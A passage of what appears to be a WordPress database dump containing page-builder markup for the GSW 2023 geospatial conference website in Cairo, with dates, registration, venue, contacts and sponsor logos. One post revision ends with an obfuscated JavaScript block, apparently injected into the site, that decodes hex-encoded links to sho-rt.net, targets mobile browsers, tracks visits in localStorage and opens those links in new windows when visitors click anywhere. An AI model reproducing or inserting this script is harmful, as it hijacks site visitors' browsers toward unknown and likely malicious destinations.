link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-24 23:33:35','2023-05-24 23:33:35','',3066,'https://gsw2023.com/?p=4573',0,'revision','',0),
(4574,1,'2023-05-24 23:34:25','2023-05-24 23:34:25','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" 